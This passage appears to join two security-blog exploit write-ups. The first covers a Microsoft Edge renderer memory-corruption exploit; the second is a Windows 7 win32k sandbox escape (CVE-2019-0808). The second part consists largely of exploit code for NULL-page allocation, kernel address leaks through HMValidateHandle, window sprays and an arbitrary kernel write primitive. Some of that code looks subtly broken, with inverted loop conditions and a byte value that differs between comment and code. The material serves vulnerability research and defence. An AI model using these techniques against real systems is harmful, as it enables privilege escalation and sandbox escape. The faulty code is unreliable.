Then the buffer object which was used for spray “B” is freed and a different spray is performed to take over the just-freed data buffer – let us call it spray “E”. Spray “E” allocates typed arrays (which are of size 0x20 bytes) and one of the typed arrays overwrites contents of the freed 0x20-byte data buffer. This allows a leak of pointers to two of the sprayed typed arrays via the typed array “TA1”. Only one pointer to the typed array is required for the exploit, let us call it typed array “TA2”. This typed array points to the data buffer of 0x30 bytes. The size of this buffer is important as it allows placement of other objects nearby which are useful for exploitation.
At this point it is known where the two typed arrays and the two audio write-buffers are located. The exploit enters a loop which constantly writes a pointer to the “TA2” typed array to the 0x10-byte object. The written pointer is increased by 0x10 bytes to point to the length field. The loop is required to win a race condition because the audio context thread keeps re-writing pointers in the 0x10-byte object. After a certain number of iterations the loop is ended and the exploit searches for the overwritten typed array.
The overwritten WTF::IEOwnedTypedArray typed array gives a relative read-write primitive.
Getting arbitrary read-write primitive
Before triggering the vulnerability the exploit has made another spray which has allocated the buffer sources and appropriate buffers for the sources – let us call it spray “F” . During this spray the WebCore::AudioBufferData objects of 0x30 bytes size with the following memory layout are created:
These objects are placed nearby the data buffer which is controlled by the typed array “TA2”. WTF::NeuteredTypedArray objects of size 0x30 bytes are placed nearby too:
After the relative read-write primitive is gained, offsets from the beginning of the typed array “TA2” buffer to these objects are found by searching for the specific pattern.
Knowing the offset to the WebCore::AudioBufferData object allows to leak a pointer to the audio channel data buffer. (The audio channel data is used to create a fake controllable DataView object and eventually achieve an arbitrary read-write primitive.) At offset 0x18 of the WebCore::AudioBufferData object, the pointer to the audio channel data buffer is stored. Before calling getChannelData() the memory layout of the channel data buffer looks like the following:
After calling getChannelData() member of the WebCore::AudioBufferData object, pointers in the channel data buffer are moved around and start pointing to the typed array objects allocated on the Chakra heap. This is important as it allows leaking the typed array pointers and creating a fake typed array. This is the memory layout of the channel data buffer after the call to getChannelData():
Knowing the offset to the WTF::NeuteredTypedArray object allows to achieve an arbitrary read primitive.
The buffer this object points to cannot be used for a write. Once the write happens, the buffer is moved to another heap. Increasing the length of the buffer is not possible due to security asserts enabled. An attempt to write to the buffer with the modified length leads to a crash of the renderer process.
The layout of the WTF::NeuteredTypedArray object looks like the following:
A pointer to the data buffer is stored at offset 8. It is possible to overwrite this pointer and point to any address to arbitrarily read memory.
With the arbitrary read primitive the contents of the typed array and the channel data buffer of the WebCore::AudioBufferData object are leaked. With the ability to write to the relative typed array, the following contents are placed in the controllable buffer:
After this operation the WebCore::AudioBufferData object points to the fake channel data (located at 0x00000140e87e7da0). The channel data contains a pointer to the fake DataView object (located at 0x00000140e87e7eb0). Initially, the Float32Array object is leaked and placed, but it is not a very convenient type to use for exploitation. To convert it to a DataView object, the type tag has to be changed in the metadata. The type tag for the Float32Array object type is 0x31, for the DataView object it is 0x38.
The fake DataView object is accessed by calling getChannelData() of the WebCore::AudioBufferData object.
At this point an arbitrary read-write primitive is achieved.
Wrapping up the renderer exploit
Getting code execution in Microsoft Edge renderer is a bit more involved in contrast to other browsers since Microsoft Edge browser employs mitigations known as Arbitrary Code Guard (ACG) and Code Integrity Guard (CIG). Nevertheless, there is a way to bypass ACG. Having an arbitrary read-write primitive it is possible to find the stack address, setup a fake stack frame and divert code execution to the function of choice by overwriting the return address. This method was chosen to execute the sandbox escape payload.
The last problem that had to be addressed in order to have reliable process continuation is a LFH double-free mitigation. Once exploitation is over, some pointers are left and when they are picked up by the heap manager, the process will crash. Certain pointers can be easily found by leaking address of required objects. One last pointer had to be found by scanning the heap as there was no straightforward way to find it. Once the pointers are found they are overwritten with null.
Open problems
The exploit has the following issues:
the vulnerability trigger depends on hardware;
exploit reliability is about 75%;
The first issue is due to the described requirement of hardware error. The trigger works only on VMWare and on some devices with integrated video hardware. It is potentially possible to avoid hardware dependency by triggering some generic video graphics hardware error.
The second issue is mostly due to the requirement to have complicated heap manipulations and LFH mitigations. Probably it is possible to improve reliability by performing smarter heap arrangement.
Process continuation was solved as described in the previous section. No artifacts exist.
Detection
It is possible to detect exploitation of the described vulnerability by searching for the combination of the following Javascript code:
repeated calls to createPattern()
setting canvas attributes “width” and “height” to large values
As a result, reliability of the renderer exploit achieved a ~75% success rate. Exploitation takes about 1-2 seconds on average. When multiple retries are required then exploitation can take a bit more time.
Microsoft has gone to great lengths to harden their Edge browser renderer process as browsers still remain a major threat attack vector and the renderer has the largest attack surface. Yet a single vulnerability was used to achieve memory disclosure and gain arbitrary read-write to compromise a content process. Part 2 will discuss an interesting logical sandbox escape vulnerability.
Exodus 0day subscribers have had access to this exploit for use on penetration tests and/or implementing protections for their stakeholders.
This post explores a recently patched Win32k vulnerability (CVE-2019-0808) that was used in the wild with CVE-2019-5786 to provide a full Google Chrome sandbox escape chain.
Overview
On March 7th 2019, Google came out with a blog post discussing two vulnerabilities that were being chained together in the wild to remotely exploit Chrome users running Windows 7 x86: CVE-2019-5786, a bug in the Chrome renderer that has been detailed in our blog post, and CVE-2019-0808, a NULL pointer dereference bug in win32k.sys affecting Windows 7 and Windows Server 2008 which allowed attackers escape the Chrome sandbox and execute arbitrary code as the SYSTEM user.
Since Google’s blog post, there has been one crash PoC exploit for Windows 7 x86 posted to GitHub by ze0r, which results in a BSOD. This blog details a working sandbox escape and a demonstration of the full exploit chain in action, which utilizes these two bugs to illustrate the APT attack encountered by Google in the wild.
Analysis of the Public PoC
To provide appropriate context for the rest of this blog, this blog will first start with an analysis of the public PoC code. The first operation conducted within the PoC code is the creation of two modeless drag-and-drop popup menus, hMenuRoot and hMenuSub.hMenuRoot will then be set up as the primary drop down menu, and hMenuSub will be configured as its submenu.
Following this, a WH_CALLWNDPROC hook is installed on the current thread using SetWindowsHookEx(). This hook will ensure that WindowHookProc() is executed prior to a window procedure being executed. Once this is done, SetWinEventHook() is called to set an event hook to ensure that DisplayEventProc() is called when a popup menu is displayed.
The following diagram shows the window message call flow before and after setting the WH_CALLWNDPROC hook.
Window message call flow before and after setting the WH_CALLWNDPROC hook
Once the hooks have been installed, the hWndFakeMenu window will be created using CreateWindowA() with the class string “#32768”, which, according to MSDN, is the system reserved string for a menu class. Creating a window in this manner will cause CreateWindowA() to set many data fields within the window object to a value of 0 or NULL as CreateWindowA() does not know how to fill them in appropriately. One of these fields which is of importance to this exploit is the spMenu field, which will be set to NULL.
hWndMain is then created using CreateWindowA() with the window class wndClass. This will set hWndMain‘s window procedure to DefWindowProc() which is a function in the Windows API responsible for handling any window messages not handled by the window itself.
The parameters for CreateWindowA() also ensure that hWndMain is created in disabled mode so that it will not receive any keyboard or mouse input from the end user, but can still receive other window messages from other windows, the system, or the application itself. This is done as a preventative measure to ensure the user doesn’t accidentally interact with the window in an adverse manner, such as repositioning it to an unexpected location. Finally the last parameters for CreateWindowA() ensure that the window is positioned at (0x1, 0x1), and that the window is 0 pixels by 0 pixels big. This can be seen in the code below.
After the hWndMain window is created, TrackPopupMenuEx() is called to display hMenuRoot. This will result in a window message being placed on hWndMain‘s message stack, which will be retrieved in main()‘s message loop via GetMessageW(), translated via TranslateMessage(), and subsequently sent to hWndMain‘s window procedure via DispatchMessageW(). This will result in the window procedure hook being executed, which will call WindowHookProc().
As the bOnDraging variable is not yet set, the WindowHookProc() function will simply call CallNextHookEx() to call the next available hook. This will cause a EVENT_SYSTEM_MENUPOPUPSTART event to be sent as a result of the popup menu being created. This event message will be caught by the event hookand will cause execution to be diverted to the function DisplayEventProc().
Since this is the first time DisplayEventProc() is being executed, iMenuCreated will be 0, which will cause case 0 to be executed. This case will send the WM_LMOUSEBUTTON window message to hWndMainusing SendMessageW() in order to select the hMenuRoot menu at point (0x5, 0x5). Once this message has been placed onto hWndMain‘s window message queue, iMenuCreated is incremented.
hWndMain then processes the WM_LMOUSEBUTTON message and selects hMenu, which will result in hMenuSub being displayed. This will trigger a second EVENT_SYSTEM_MENUPOPUPSTART event, resulting in DisplayEventProc() being executed again. This time around the second case is executed as iMenuCreated is now 1. This case will use SendMessageW() to move the mouse to point (0x6, 0x6) on the user’s desktop. Since the left mouse button is still down, this will make it seem like a drag and drop operation is being performed. Following this iMenuCreated is incremented once again and execution returns to the following code with the message loop inside main().
Since iMenuCreated now holds a value of 2, the code inside the if statement will be executed, which will set bOnDraging to TRUE to indicate the drag operation was conducted with the mouse, after which a call will be made to the function callNtUserMNDragOverSysCall() with the address of the POINT structure pt and the 0x100 byte long output buffer buf.
callNtUserMNDragOverSysCall() is a wrapper function which makes a syscall to NtUserMNDragOver() in win32k.sys using the syscall number 0x11ED, which is the syscall number for NtUserMNDragOver() on Windows 7 and Windows 7 SP1. Syscalls are used in favor of the PoC’s method of obtaining the address of NtUserMNDragOver() from user32.dll since syscall numbers tend to change only across OS versions and service packs (a notable exception being Windows 10 which undergoes more constant changes), whereas the offsets between the exported functions in user32.dll and the unexported NtUserMNDragOver() function can change anytime user32.dll is updated.
void callNtUserMNDragOverSysCall(LPVOID address1, LPVOID address2) {
_asm {
mov eax, 0x11ED
push address2
push address1
mov edx, esp
int 0x2E
pop eax
pop eax
}
}
NtUserMNDragOver() will end up calling xxxMNFindWindowFromPoint(), which will execute xxxSendMessage() to issue a usermode callback of type WM_MN_FINDMENUWINDOWFROMPOINT. The value returned from the user mode callback is then checked using HMValidateHandle() to ensure it is a handle to a window object.
LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
v6 = xxxSendMessage(
var_pPopupMenu->spwndNextPopup,
MN_FINDMENUWINDOWFROMPOINT,
(WPARAM)&pPopupMenu,
(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the
// MN_FINDMENUWINDOWFROMPOINT usermode callback
// using the address of pPopupMenu as the
// wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
// mode callback is a handle to a MFMWFP window.
v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned
// handle is a handle to
// a window object. Set v1 to
// TRUE if all is good.
...
When the callback is performed, the window procedure hook function, WindowHookProc(), will be executed before the intended window procedure is executed. This function will check to see what type of window message was received. If the incoming window message is a WM_MN_FINDMENUWINDOWFROMPOINT message, the following code will be executed.
This code will change the window procedure for hWndMain from DefWindowProc() to SubMenuProc(). It will also set bIsDefWndProc to FALSE to indicate that the window procedure for hWndMain is no longer DefWindowProc().
Once the hook exits, hWndMain‘s window procedure is executed. However, since the window procedure for the hWndMain window was changed to SubMenuProc(), SubMenuProc() is executed instead of the expected DefWindowProc() function.
SubMenuProc() will first check if the incoming message is of type WM_MN_FINDMENUWINDOWFROMPOINT. If it is, SubMenuProc() will call SetWindowLongPtr() to set the window procedure for hWndMain back to DefWindowProc() so that hWndMain can handle any additional incoming window messages. This will prevent the application becoming unresponsive. SubMenuProc() will then return hWndFakeMenu, or the handle to the window that was created using the menu class string.
Since hWndFakeMenu is a valid window handle it will pass the HMValidateHandle() check. However, as mentioned previously, many of the window’s elements will be set to 0 or NULL as CreateWindowEx() tried to create a window as a menu without sufficient information. Execution will subsequently proceed from xxxMNFindWindowFromPoint() to xxxMNUpdateDraggingInfo(), which will perform a call to MNGetpItem(), which will in turn call MNGetpItemFromIndex().
MNGetpItemFromIndex() will then try to access offsets within hWndFakeMenu‘s spMenu field. However since hWndFakeMenu‘s spMenu field is set to NULL, this will result in a NULL pointer dereference, and a kernel crash if the NULL page has not been allocated.
tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax
if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ){ // NULL pointer dereference will occur
// here if spMenu is NULL.
result = 0;
else
result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}
Sandbox Limitations
To better understand how to escape Chrome’s sandbox, it is important to understand how it operates. Most of the important details of the Chrome sandbox are explained on Google’s Sandbox page. Reading this page reveals several important details about the Chrome sandbox which are relevant to this exploit. These are listed below:
All processes in the Chrome sandbox run at Low Integrity.
A restrictive job object is applied to the process token of all the processes running in the Chrome sandbox. This prevents the spawning of child processes, amongst other things.
Processes running in the Chrome sandbox run in an isolated desktop, separate from the main desktop and the service desktop to prevent Shatter attacks that could result in privilege escalation.
On Windows 8 and higher the Chrome sandbox prevents calls to win32k.sys.
The first protection in this list is that processes running inside the sandbox run with Low integrity. Running at Low integrity prevents attackers from being able to exploit a number of kernel leaks mentioned on sam-b’s kernel leak page, as starting with Windows 8.1, most of these leaks require that the process be running with Medium integrity or higher. This limitation is bypassed in the exploit by abusing a well known memory leak in the implementation of HMValidateHandle() on Windows versions prior to Windows 10 RS4, and is discussed in more detail later in the blog.
The next limitation is the restricted job object and token that are placed on the sandboxed process. The restricted token ensures that the sandboxed process runs without any permissions, whilst the job object ensures that the sandboxed process cannot spawn any child processes. The combination of these two mitigations means that to escape the sandbox the attacker will likely have to create their own process token or steal another process token, and then subsequently disassociate the job object from that token. Given the permissions this requires, this most likely will require a kernel level vulnerability. These two mitigations are the most relevant to the exploit; their bypasses are discussed in more detail later on in this blog.
The job object additionally ensures that the sandboxed process uses what Google calls the “alternate desktop” (known in Windows terminology as the “limited desktop”), which is a desktop separate from the main user desktop and the service desktop, to prevent potential privilege escalations via window messages. This is done because Windows prevents window messages from being sent between desktops, which restricts the attacker to only sending window messages to windows that are created within the sandbox itself. Thankfully this particular exploit only requires interaction with windows created within the sandbox, so this mitigation only really has the effect of making it so that the end user can’t see any of the windows and menus the exploit creates.
Finally it’s worth noting that whilst protections were introduced in Windows 8 to allow Chrome to prevent sandboxed applications from making syscalls to win32k.sys, these controls were not backported to Windows 7. As a result Chrome’s sandbox does not have the ability to prevent calls to win32k.sys on Windows 7 and prior, which means that attackers can abuse vulnerabilities within win32k.sys to escape the Chrome sandbox on these versions of Windows.
Sandbox Exploit Explanation
Creating a DLL for the Chrome Sandbox
As is explained in James Forshaw’s In-Console-Able blog post, it is not possible to inject just any DLL into the Chrome sandbox. Due to sandbox limitations, the DLL has to be created in such a way that it does not load any other libraries or manifest files.
To achieve this, the Visual Studio project for the PoC exploit was first adjusted so that the project type would be set to a DLL instead of an EXE. After this, the C++ compiler settings were changed to tell it to use the multi-threaded runtime library (not a multithreaded DLL). Finally the linker settings were changed to instruct Visual Studio not to generate manifest files.
Once this was done, Visual Studio was able to produce DLLs that could be loaded into the Chrome sandbox via a vulnerability such as István Kurucsai’s 1Day Chrome vulnerability, CVE-2019-5786 (which was detailed in a previous blog post), or via DLL injection with a program such as this one.
Explanation of the Existing Limited Write Primitive
Before diving into the details of how the exploit was converted into a sandbox escape, it is important to understand the limited write primitive that this exploit grants an attacker should they successfully set up the NULL page, as this provides the basis for the discussion that occurs throughout the following sections.
Once the vulnerability has been triggered, xxxMNUpdateDraggingInfo() will be called in win32k.sys. If the NULL page has been set up correctly, then xxxMNUpdateDraggingInfo() will call xxxMNSetGapState(), whose code is shown below:
void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
...
var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write
// operation should occur, minus an
// offset of 0x4.
temp_var_PITEM = var_PITEM;
if ( var_PITEM )
{
...
var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the
// address where the second write operation
// should occur, minus an offset of 0x4. This
// address will be 0x6C bytes earlier in
// memory than the address in var_PITEM.
if ( fSet )
{
*((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the
// attacker controlled address.
if ( var_PITEM_Minus_Offset_Of_0x6C )
{
*((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;
// Conduct the second write to the attacker
// controlled address minus 0x68 (0x6C-0x4).
...
xxxMNSetGapState() performs two write operations to an attacker controlled location plus an offset of 4. The only difference between the two write operations is that 0x40000000 is written to an address located 0x6C bytes earlier than the address where the 0x80000000 write is conducted.
It is also important to note is that the writes are conducted using OR operations. This means that the attacker can only add bits to the DWORD they choose to write to; it is not possible to remove or alter bits that are already there. It is also important to note that even if an attacker starts their write at some offset, they will still only be able to write the value \x40 or \x80 to an address at best.
From these observations it becomes apparent that the attacker will require a more powerful write primitive if they wish to escape the Chrome sandbox. To meet this requirement, Exodus Intelligence’s exploit utilizes the limited write primitive to create a more powerful write primitive by abusing tagWND objects. The details of how this is done, along with the steps required to escape the sandbox, are explained in more detail in the following sections.
Allocating the NULL Page
On Windows versions prior to Windows 8, it is possible to allocate memory in the NULL page from userland by calling NtAllocateVirtualMemory(). Within the PoC code, the main() function was adjusted to obtain the address of NtAllocateVirtualMemory() from ntdll.dll and save it into the variable pfnNtAllocateVirtualMemory.
Once this is done, allocateNullPage() is called to allocate the NULL page itself, using address 0x1, with read, write, and execute permissions. The address 0x1 will then then rounded down to 0x0 by NtAllocateVirtualMemory() to fit on a page boundary, thereby allowing the attacker to allocate memory at 0x0.
typedef NTSTATUS(WINAPI *NTAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG AllocationSize,
ULONG AllocationType,
ULONG Protect
);
NTAllocateVirtualMemory pfnNtAllocateVirtualMemory = 0;
....
pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
....
// Thanks to https://github.com/YeonExp/HEVD/blob/c19ad75ceab65cff07233a72e2e765be866fd636/NullPointerDereference/NullPointerDereference/main.cpp#L56 for
// explaining this in an example along with the finer details that are often forgotten.
bool allocateNullPage() {
/* Set the base address at which the memory will be allocated to 0x1.
This is done since a value of 0x0 will not be accepted by NtAllocateVirtualMemory,
however due to page alignment requirements the 0x1 will be rounded down to 0x0 internally.*/
PVOID BaseAddress = (PVOID)0x1;
/* Set the size to be allocated to 40960 to ensure that there
is plenty of memory allocated and available for use. */
SIZE_T size = 40960;
/* Call NtAllocateVirtualMemory to allocate the virtual memory at address 0x0 with the size
specified in the variable size. Also make sure the memory is allocated with read, write,
and execute permissions.*/
NTSTATUS result = pfnNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0x0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
// If the call to NtAllocateVirtualMemory failed, return FALSE.
if (result != 0x0) {
return FALSE;
}
// If the code reaches this point, then everything went well, so return TRUE.
return TRUE;
}
Finding the Address of HMValidateHandle
Once the NULL page has been allocated the exploit will then obtain the address of the HMValidateHandle() function. HMValidateHandle() is useful for attackers as it allows them to obtain a userland copy of any object provided that they have a handle. Additionally this leak also works at Low Integrity on Windows versions prior to Windows 10 RS4.
By abusing this functionality to copy objects which contain a pointer to their location in kernel memory, such as tagWND (the window object), into user mode memory, an attacker can leak the addresses of various objects simply by obtaining a handle to them.
As the address of HMValidateHandle() is not exported from user32.dll, an attacker cannot directly obtain the address of HMValidateHandle() via user32.dll‘s export table. Instead, the attacker must find another function that user32.dll exports which calls HMValidateHandle(), read the value of the offset within the indirect jump, and then perform some math to calculate the true address of HMValidateHandle().
This is done by obtaining the address of the exported function IsMenu() from user32.dll and then searching for the first instance of the byte \xEB within IsMenu()‘s code, which signals the start of an indirect call to HMValidateHandle(). By then performing some math on the base address of user32.dll, the relative offset in the indirect call, and the offset of IsMenu() from the start of user32.dll, the attacker can obtain the address of HMValidateHandle(). This can be seen in the following code.
HMODULE hUser32 = LoadLibraryW(L"user32.dll");
LoadLibraryW(L"gdi32.dll");
// Find the address of HMValidateHandle using the address of user32.dll
if (findHMValidateHandleAddress(hUser32) == FALSE) {
printf("[!] Couldn't locate the address of HMValidateHandle!\r\n");
ExitProcess(-1);
}
...
BOOL findHMValidateHandleAddress(HMODULE hUser32) {
// The address of the function HMValidateHandleAddress() is not exported to
// the public. However the function IsMenu() contains a call to HMValidateHandle()
// within it after some short setup code. The call starts with the byte \xEB.
// Obtain the address of the function IsMenu() from user32.dll.
BYTE * pIsMenuFunction = (BYTE *)GetProcAddress(hUser32, "IsMenu");
if (pIsMenuFunction == NULL) {
printf("[!] Failed to find the address of IsMenu within user32.dll.\r\n");
return FALSE;
}
else {
printf("[*] pIsMenuFunction: 0x%08X\r\n", pIsMenuFunction);
}
// Search for the location of the \xEB byte within the IsMenu() function
// to find the start of the indirect call to HMValidateHandle().
unsigned int offsetInIsMenuFunction = 0;
BOOL foundHMValidateHandleAddress = FALSE;
for (unsigned int i = 0; i > 0x1000; i++) {
BYTE* pCurrentByte = pIsMenuFunction + i;
if (*pCurrentByte == 0xE8) {
offsetInIsMenuFunction = i + 1;
break;
}
}
// Throw error and exit if the \xE8 byte couldn't be located.
if (offsetInIsMenuFunction == 0) {
printf("[!] Couldn't find offset to HMValidateHandle within IsMenu.\r\n");
return FALSE;
}
// Output address of user32.dll in memory for debugging purposes.
printf("[*] hUser32: 0x%08X\r\n", hUser32);
// Get the value of the relative address being called within the IsMenu() function.
unsigned int relativeAddressBeingCalledInIsMenu = *(unsigned int *)(pIsMenuFunction + offsetInIsMenuFunction);
printf("[*] relativeAddressBeingCalledInIsMenu: 0x%08X\r\n", relativeAddressBeingCalledInIsMenu);
// Find out how far the IsMenu() function is located from the base address of user32.dll.
unsigned int addressOfIsMenuFromStartOfUser32 = ((unsigned int)pIsMenuFunction - (unsigned int)hUser32);
printf("[*] addressOfIsMenuFromStartOfUser32: 0x%08X\r\n", addressOfIsMenuFromStartOfUser32);
// Take this offset and add to it the relative address used in the call to HMValidateHandle().
// Result should be the offset of HMValidateHandle() from the start of user32.dll.
unsigned int offset = addressOfIsMenuFromStartOfUser32 + relativeAddressBeingCalledInIsMenu;
printf("[*] offset: 0x%08X\r\n", offset);
// Skip over 11 bytes since on Windows 10 these are not NOPs and it would be
// ideal if this code could be reused in the future.
pHmValidateHandle = (lHMValidateHandle)((unsigned int)hUser32 + offset + 11);
printf("[*] pHmValidateHandle: 0x%08X\r\n", pHmValidateHandle);
return TRUE;
}
Creating a Arbitrary Kernel Address Write Primitive with Window Objects
Once the address of HMValidateHandle() has been obtained, the exploit will call the sprayWindows() function. The first thing that sprayWindows() does is register a new window class named sprayWindowClass using RegisterClassExW(). The sprayWindowClass will also be set up such that any windows created with this class will use the attacker defined window procedure sprayCallback().
A HWND table named hwndSprayHandleTable will then be created, and a loop will be conducted which will call CreateWindowExW() to create 0x100 tagWND objects of class sprayWindowClass and save their handles into the hwndSprayHandle table. Once this spray is complete, two loops will be used, one nested inside the other, to obtain a userland copy of each of the tagWND objects using HMValidateHandle().
The kernel address for each of these tagWND objects is then obtained by examining the tagWND objects’ pSelf field. The kernel address of each of the tagWND objects are compared with one another until two tagWND objects are found that are less than 0x3FD00 apart in kernel memory, at which point the loops are terminated.
/* The following definitions define the various structures
needed within sprayWindows() */
typedef struct _HEAD
{
HANDLE h;
DWORD cLockObj;
} HEAD, *PHEAD;
typedef struct _THROBJHEAD
{
HEAD h;
PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;
typedef struct _THRDESKHEAD
{
THROBJHEAD h;
PVOID rpdesk;
PVOID pSelf; // points to the kernel mode address of the object
} THRDESKHEAD, *PTHRDESKHEAD;
....
// Spray the windows and find two that are less than 0x3fd00 apart in memory.
if (sprayWindows() == FALSE) {
printf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");
ExitProcess(-1);
}
....
// Define the HMValidateHandle window type TYPE_WINDOW appropriately.
#define TYPE_WINDOW 1
/* Main function for spraying the tagWND objects into memory and finding two
that are less than 0x3fd00 apart */
bool sprayWindows() {
HWND hwndSprayHandleTable[0x100]; // Create a table to hold 0x100 HWND handles created by the spray.
// Create and set up the window class for the sprayed window objects.
WNDCLASSEXW sprayClass = { 0 };
sprayClass.cbSize = sizeof(WNDCLASSEXW);
sprayClass.lpszClassName = TEXT("sprayWindowClass");
sprayClass.lpfnWndProc = sprayCallback; // Set the window procedure for the sprayed
// window objects to sprayCallback().
if (RegisterClassExW(&sprayClass) == 0) {
printf("[!] Couldn't register the sprayClass class!\r\n");
}
// Create 0x100 windows using the sprayClass window class with the window name "spray".
for (int i = 0; i < 0x100; i++) {
hwndSprayHandleTable[i] = CreateWindowExW(0, sprayClass.lpszClassName, TEXT("spray"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
}
// For each entry in the hwndSprayHandle table...
for (int x = 0; x < 0x100; x++) {
// Leak the kernel address of the current HWND being examined, save it into firstEntryAddress.
THRDESKHEAD *firstEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[x], TYPE_WINDOW);
unsigned int firstEntryAddress = (unsigned int)firstEntryDesktop->pSelf;
// Then start a loop to start comparing the kernel address of this hWND
// object to the kernel address of every other hWND object...
for (int y = 0; y < 0x100; y++) {
if (x != y) { // Skip over one instance of the loop if the entries being compared are
// at the same offset in the hwndSprayHandleTable
// Leak the kernel address of the second hWND object being used in
// the comparison, save it into secondEntryAddress.
THRDESKHEAD *secondEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[y], TYPE_WINDOW);
unsigned int secondEntryAddress = (unsigned int)secondEntryDesktop->pSelf;
// If the kernel address of the hWND object leaked earlier in the code is greater than
// the kernel address of the hWND object leaked above, execute the following code.
if (firstEntryAddress > secondEntryAddress) {
// Check if the difference between the two addresses is less than 0x3fd00.
if ((firstEntryAddress - secondEntryAddress) < 0x3fd00) {
printf("[*] Primary window address: 0x%08X\r\n", secondEntryAddress);
printf("[*] Secondary window address: 0x%08X\r\n", firstEntryAddress);
// Save the handle of secondEntryAddress into hPrimaryWindow
// and its address into primaryWindowAddress.
hPrimaryWindow = hwndSprayHandleTable[y];
primaryWindowAddress = secondEntryAddress;
// Save the handle of firstEntryAddress into hSecondaryWindow
// and its address into secondaryWindowAddress.
hSecondaryWindow = hwndSprayHandleTable[x];
secondaryWindowAddress = firstEntryAddress;
// Windows have been found, escape the loop.
break;
}
}
// If the kernel address of the hWND object leaked earlier in the code is less than
// the kernel address of the hWND object leaked above, execute the following code.
else {
// Check if the difference between the two addresses is less than 0x3fd00.
if ((secondEntryAddress - firstEntryAddress) < 0x3fd00) {
printf("[*] Primary window address: 0x%08X\r\n", firstEntryAddress);
printf("[*] Secondary window address: 0x%08X\r\n", secondEntryAddress);
// Save the handle of firstEntryAddress into hPrimaryWindow
// and its address into primaryWindowAddress.
hPrimaryWindow = hwndSprayHandleTable[x];
primaryWindowAddress = firstEntryAddress;
// Save the handle of secondEntryAddress into hSecondaryWindow
// and its address into secondaryWindowAddress.
hSecondaryWindow = hwndSprayHandleTable[y];
secondaryWindowAddress = secondEntryAddress;
// Windows have been found, escape the loop.
break;
}
}
}
}
// Check if the inner loop ended and the windows were found. If so print a debug message.
// Otherwise continue on to the next object in the hwndSprayTable array.
if (hPrimaryWindow != NULL) {
printf("[*] Found target windows!\r\n");
break;
}
}
Once two tagWND objects matching these requirements are found, their addresses will be compared to see which one is located earlier in memory. The tagWND object located earlier in memory will become the primary window; its address will be saved into the global variable primaryWindowAddress, whilst its handle will be saved into the global variable hPrimaryWindow. The other tagWND object will become the secondary window; its address is saved into secondaryWindowAddress and its handle is saved into hSecondaryWindow.
Once the addresses of these windows have been saved, the handles to the other windows within hwndSprayHandle are destroyed using DestroyWindow() in order to release resources back to the host operating system.
// Check that hPrimaryWindow isn't NULL after both the loops are
// complete. This will only occur in the event that none of the 0x1000
// window objects were within 0x3fd00 bytes of each other. If this occurs, then bail.
if (hPrimaryWindow == NULL) {
printf("[!] Couldn't find the right windows for the tagWND primitive. Exiting....\r\n");
return FALSE;
}
// This loop will destroy the handles to all other
// windows besides hPrimaryWindow and hSecondaryWindow,
// thereby ensuring that there are no lingering unused
// handles wasting system resources.
for (int p = 0; p > 0x100; p++) {
HWND temp = hwndSprayHandleTable[p];
if ((temp != hPrimaryWindow) && (temp != hSecondaryWindow)) {
DestroyWindow(temp);
}
}
addressToWrite = (UINT)primaryWindowAddress + 0x90; // Set addressToWrite to
// primaryWindow's cbwndExtra field.
printf("[*] Destroyed spare windows!\r\n");
// Check if its possible to set the window text in hSecondaryWindow.
// If this isn't possible, there is a serious error, and the program should exit.
// Otherwise return TRUE as everything has been set up correctly.
if (SetWindowTextW(hSecondaryWindow, L"test String") == 0) {
printf("[!] Something is wrong, couldn't initialize the text buffer in the secondary window....\r\n");
return FALSE;
}
else {
return TRUE;
}
The final part of sprayWindows() sets addressToWrite to the address of the cbwndExtra field within primaryWindowAddress in order to let the exploit know where the limited write primitive should write the value 0x40000000 to.
To understand why tagWND objects where sprayed and why the cbwndExtra and strName.Buffer fields of a tagWND object are important, it is necessary to examine a well known kernel write primitive that exists on Windows versions prior to Windows 10 RS1.
As is explained in Saif Sheri and Ian Kronquist’s The Life & Death of Kernel Object Abuse paper and Morten Schenk’s Taking Windows 10 Kernel Exploitation to The Next Level presentation, if one can place two tagWND objects together in memory one after another and then edit the cbwndExtra field of the tagWND object located earlier in memory via a kernel write vulnerability, they can extend the expected length of the former tagWND’s WndExtra data field such that it thinks it controls memory that is actually controlled by the second tagWND object.
The following diagram shows how the exploit utilizes this concept to set the cbwndExtra field of hPrimaryWindow to 0x40000000 by utilizing the limited write primitive that was explained earlier in this blog post, as well as how this adjustment allows the attacker to set data inside the second tagWND object that is located adjacent to it.
Effects of adjusting the cbwndExtra field in hPrimaryWindow
Once the cbwndExtra field of the first tagWND object has been overwritten, if an attacker calls SetWindowLong() on the first tagWND object, an attacker can overwrite the strName.Buffer field in the second tagWND object and set it to an arbitrary address. When SetWindowText() is called using the second tagWND object, the address contained in the overwritten strName.Buffer field will be used as destination address for the write operation.
